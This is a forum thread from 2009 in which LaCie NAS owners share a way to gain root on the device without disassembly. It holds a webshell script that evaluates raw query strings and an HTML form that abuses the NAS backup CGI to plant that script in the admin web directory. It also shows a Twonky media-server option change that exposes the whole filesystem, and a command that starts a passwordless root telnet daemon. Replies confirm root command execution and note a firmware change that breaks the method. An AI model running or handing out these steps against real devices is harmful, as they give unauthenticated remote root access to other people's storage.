add ssh without dissambling

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

add ssh without dissambling

Post by belese » Tue May 19, 2009 1:02 am

Hi,

i found a way to add webshell without dissassembling.

it suppose you have acces to admin of twonkymedia

http://lacie.nas-central.org/wiki/Netwo ... diaServers

First you have to create a file Webshell and copy it to a folder on an usb key

Code: Select all

#!/bin/sh 
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
Plug the usb key on the NAS.

i can't upload file so copy this code on a html page :

Code: Select all

<html>
<head>
	<title>Backup</title>
	<script language='Javascript'>
	function submitForm()
	{
		document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
		document.edit_form.submit();
	}
	</script>
</head>
<body>

<form name='edit_form' method='post' >

Nas Ip adress or Name
</br>
<input tyte='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
</br>

Source (Path to folder and not file on usbkey)
(Not / at the end)
</br>
<input tyte='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
</br>

Destination (Normally, don't modify)
(Not / at the end)
</br>
<input tyte='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
</br>

<input type='hidden' id='update' name='update' value='true'>

</br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>


open it, complete with correct value and click copy

it will display an error, but copy the file but it create a directory with a timestamp.

so to know the name of the directory.

http://your ip:9000/rpc/set_option?contentbase=/

no go to a config page of twonky media(http://your ip:9000/config), and look for a directory, you have now acces to all directory.
go to "/www/cgi-bin/admin/"
there is there the directory with the time-stamp.

copy it and paste to :
http://your ip/cgi-bin/admin/your directory/webshell?

webshell is now working.

after you can follow the procedure here :

http://jebimony.com/blog/content/add-ss ... -edmini-v2
Last edited by belese on Thu May 21, 2009 5:01 pm, edited 3 times in total.

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Tue May 19, 2009 6:51 pm

Wow...

That's great! :D

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Tue May 19, 2009 7:35 pm

Hmmm. I'm trying to apply your hack, but I have a hard time modifying backup.html. You have single quotation marks (') where I have double ("), and in your third line they do not match. Your last line I cannot find at all.

Do you mind posting your entire modified backup.html?

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without dissambling

Post by belese » Tue May 19, 2009 11:18 pm

I clean the code and put in in my first post, so i remove this post

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Mon May 25, 2009 9:18 pm

Thank you for the nice html file. :) I have tried it and it works.
I already had access because I have opened the NAS before, but now a I have an additional webshell.

It is actually surprisingly simple if I understand it correctly. From a desktop pc, your html file issues commands available on the NAS coded in scripts in /www/cgi-bin/admin and in /usr/bin/edmini.sh to copy files from an usb disk or stick to any location on the NAS. These commands are meant to make backups, but they let you copy any file, anywhere, with executable rights, and we use it to put the webshell backdoor in place. You don't need Twonky to do that. You can exploit Twonky to find out the exact name of the directory, which is difficult to guess because it is the name of the original directory with a many digit time stamp added. Therefore we set the top directory of Twonky to the root directory of the NAS (/) with your nifty command

Code: Select all

http://networkspace:9000/rpc/set_option?contentbase=/
Then we can use Twonky's web config page to get a directory listing of /www/cgi-bin/admin and see the name of the "backed up" directory. In my case, I could access the webshell by 'going to'

Code: Select all

http://networkspace/cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami
in a web browser. The answer I got to the whoami was

"root"

:-)

Anyone else got it working?

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without dissambling

Post by belese » Tue May 26, 2009 10:20 pm

hi

thanks to translate my explanation in "real" english!!! 8-)
i'm sorry for my english, but i'm a french native speaker.

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Tue May 26, 2009 10:42 pm

belese wrote:thanks to translate my explanation in "real" english!!! 8-)
Thank you for the hack! Let's include it in the wiki. But first some more people that have used it successfully. For instance: does the original webshell file that is "backed up" need to have permissions set to executable? Does it need to come from a ext3-like file system?

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without dissambling

Post by belese » Tue May 26, 2009 10:45 pm

i think when it copy, it keep the same right, but i have not test it really.
i think too that you don't need to have a usb key, and can copy directly from /home/openshare, but also, i don't test it.
and for ext3, no, i've done everything from windows with an usb key in ntfs(but be sur your webshell is in UNIX format!!) i've lost more than 2 hours because my webshell was in Windows text mode.

theike
Posts: 27
Joined: Sun Mar 08, 2009 10:19 pm

Re: add ssh without dissambling

Post by theike » Wed May 27, 2009 9:47 am

Hi,

Great find (Why didn't i come up with it myself :D )

I confirm it works and you don't need the usb-stick. Just copy the file (using samba/windows share) to your openshare (create a new folder, as all in this folder will be copied to the admin page. And you just want the backdoor there.

For instance: create a folder 'hack' and name the injection script 'backdoor' (the small script, not the html).

How open your HTML-page and edit the source path to '/home/openshare/hack' and that should be it
You get an error that there is no USB device connected (so what :) ) and you need to find the timestamped folder. (use twonky)

To make the hack complete:
Copy the telnet deamon (utelnetd) to your openshare and call the following page:
http://networkspace/cgi-bin/admin/hack- ... e/utelnetd -l /bin/bash

This will start telnet without password check. Password check is not (yet) possible as root has no password assigned. You will be authenticated as root.

You're done :)

Kind regards,
Theike

jhench
Posts: 6
Joined: Tue Mar 18, 2008 2:35 pm

GREAT!

Post by jhench » Sun Jun 07, 2009 10:00 am

Congratulations, this is really neat. THANK YOU!

I was less patient with my first edmini V2 more than 2 years ago and grabbed the screwdriver :twisted: very quickly. Yet, I was always hoping someone would come up with an idea!

I wonder if the hack can be applied to the 2big as well. Here, the RAID1 is kind of an obstacle when trying to access and modify the HD content with another computer. If that worked here (assuming similar applications and shell scripts on the 2big) as well the 2big might be modified while running in RAID 1. And that would mean: No problem with synchronizing two drives and no messing around with mounting them as RAID 1. As soon as I get hold of a 2big I will try it.

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: add ssh without dissambling

Post by Ferretz » Fri Jun 26, 2009 11:18 am

Hi

Well, I am either doing something wrong, or lacie have changed some of their scripts. (This is a bit moot, as i have already gained access to the box using earlier techniques, but some folks may strike the same problem)

Also, my device is very new, but i am not sure how to check firmware versions etc.

Anyways...

I have created the directories and scripts as directed above, but when i load the webpage and press the button, the following error message appears briefly before the backup webpage then loads.

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"

some lines of the the backup script i.e. /www/cgi-bin/admin/backup are shown below, line 131 is in red.
I think the real culprit is line 121, in blue - as it appears to be checking that /home is in the destination path. If /home is not in the destination path, the script bombs out and prevents this hack working !?

Is anyone else getting the same problem ?

SRC_SIZE=`du -s $BACKUP_SRC | awk '{print $1}'`
DEST_SIZE=`df $BACKUP_DEST | grep /home | awk '{print $4}'`

if [ $ERR_CODE -eq 0 ] && [ -z "$BACKUP_DEST" ] || [ -z "$BACKUP_SRC" ]
then
# ---
# --- Something missing
# ---
ERR_CODE=2
fi

if [ $ERR_CODE -eq 0 ] && [ ${DEST_SIZE} -lt ${SRC_SIZE} ]
then
# ---
# --- no enough space in destination
# ---
ERR_CODE=3
fi

if [ $ERR_CODE -eq 0 ]

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Fri Jun 26, 2009 5:47 pm

You can see the firmware version by surfing to the Configuration web page and the click "Support".

Mine is version 1.1.6.

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: add ssh without dissambling

Post by Ferretz » Mon Jun 29, 2009 11:20 am

and mine with a possibly new set of (not so hackable) backup scripts, is version 1.1.8

Has anyone else with version 1.1.8 had any success in using the approach as defined in this thread ?

Ack.

theike
Posts: 27
Joined: Sun Mar 08, 2009 10:19 pm

Re: add ssh without dissambling

Post by theike » Tue Jun 30, 2009 7:51 pm

Any chance of providing us with a copy of the .8-scripts?

Kind regards,
Theike

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without dissambling

Post by belese » Tue Jun 30, 2009 11:20 pm

hi,

i've got the same error, but it copy file anyway (for me, but i've also 1.1.6).

Post Reply